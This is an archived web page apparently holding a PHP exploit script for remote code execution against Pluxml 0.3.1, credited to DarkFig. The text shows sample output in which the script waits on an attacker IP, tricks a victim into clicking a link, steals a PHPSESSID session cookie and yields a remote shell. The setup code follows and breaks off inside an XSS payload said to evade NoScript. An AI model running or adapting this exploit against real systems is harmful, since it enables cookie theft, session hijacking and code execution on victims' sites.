AOH :: HP Unsorted P :: TB11416.HTM

Pluxml 0.3.1 Remote Code Execution Exploit



Pluxml 0.3.1 Remote Code Execution Exploit
Pluxml 0.3.1 Remote Code Execution Exploit



 sploit.php -url http://victim.com/pluxml0.3.1/ -ip 90.27.10.196 
# [/]Waiting for connection on http://90.27.10.196:80/ 
# [!]Now you have to make the victim to click on the url
# [+]Received 395 bytes from 182.26.54.2:2007
# [+]Sending 366 bytes to 182.26.54.2:2007
# [+]Received 326 bytes from 182.26.54.2:2009
# [+]Sending 366 bytes to 182.26.54.2:2009
# [+]Received 692 bytes from 182.26.54.2:2010
# [!]Received one cookie from 182.26.54.2:2010
# [/]Verifying if there is a valid session id cookie
# [-]No: pollvote=1
# [!]Yes: PHPSESSID=c6255827c1a07c51a95af691a612484b
# [+]The created socket has been shut down
# $shell> whoami
# darkfig
#
if($argc < 5)
{
print("
------------ Pluxml 0.3.1 Remote Code Execution Exploit -------------
---------------------------------------------------------------------
Credits: DarkFig  
                 URL: acid-root.new.fr || mgsdl.free.fr
IRC: #acidroot@irc.worldnet.net 
                Note: Coded for fun 8)
---------------------------------------------------------------------
   Usage: $argv[0] -url <> -ip <> [Options]
Params: -url For example http://victim.com/pluxml0.3.1/ 
          -ip        The IP that will be bound to the socket
 Options: -port      The socket will listen on this port (default=80)
          -proxy     If you wanna use a proxy  
          -proxyauth Basic authentification 
---------------------------------------------------------------------
");exit(1);
}

# PhpSploit object
####################
$xpl = new phpsploit();
$xpl->agent('Firefox');

# Server
##########
$server_addr = getparam('ip',1);
$server_port = (getparam('port')!='') ? getparam('port') : '80';
$server_url = "http://$server_addr:$server_port/"; 

# Victim
##########
$hack = getparam('url',1);
$html = "

hello :)

\n"; # Apparently my XSS bypass NoScript protection ################################################ $xss = "